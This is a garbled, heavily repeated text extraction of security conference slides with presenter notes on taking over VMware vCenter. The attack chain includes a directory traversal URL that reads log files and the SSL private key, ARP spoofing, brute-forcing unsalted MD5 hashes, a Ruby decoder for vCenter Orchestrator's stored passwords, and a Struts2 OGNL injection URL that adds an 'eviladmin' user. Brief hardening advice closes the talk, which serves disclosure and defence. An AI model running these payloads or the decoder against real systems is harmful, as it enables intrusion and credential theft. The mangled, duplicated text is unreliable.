ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 8: Invest in security

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 9: Invest in security

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 10: Invest in security

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 11: Invest in security

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
